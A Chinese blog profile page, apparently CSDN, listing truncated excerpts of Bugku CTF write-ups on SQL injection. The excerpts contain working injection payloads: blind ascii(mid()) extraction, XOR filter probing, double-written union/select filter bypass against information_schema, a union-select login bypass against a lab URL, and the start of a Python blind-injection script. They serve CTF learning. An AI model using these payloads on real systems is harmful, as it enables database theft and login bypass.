- 博客(6)
- 资源 (1)
- 收藏
- 关注
原创 bugku-sql注入2 (附详细代码)
构造select * from * where uname = $_POST[uname]uname=admin’-’此时uname=-1,不行$sql = select * from users where username=$username;在字符串username的值和数字0比较的时候,字符串变为了0故此0=0payload:admin’-(ascii(mid(R...
2019-06-20 22:14:42 1955 2
原创 bugku-多次 (详细)
第一个考点:异或注入判断过滤关键字?id=1’^(length(‘union’)!=0)–+过滤的用双写绕过GET /1ndex.php?id=-1' ununionion selselectect 2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7765623130...
2019-06-20 14:55:19 1858
原创 bugku-这是一个神奇的登陆框(附代码)(详细)
题目链接:http://123.206.87.240:9001/sql/数据库表名列名select flag代码admin_name=admin" union select database(),database() #&admin_passwd=12345&submit=GO+GO+GOadmin_name=admin" union select (s...
2019-06-20 12:29:05 894
原创 bugku-INSERT INTO注入(附代码) 详细
# -*-coding:utf-8-*-# author : wen# flag:wen{b7bb30b3435f2e7c418b131f9e789f81}import requestsimport timeurl = 'http://123.206.87.240:8002/web15/'payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHI...
2019-06-19 21:32:36 664
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人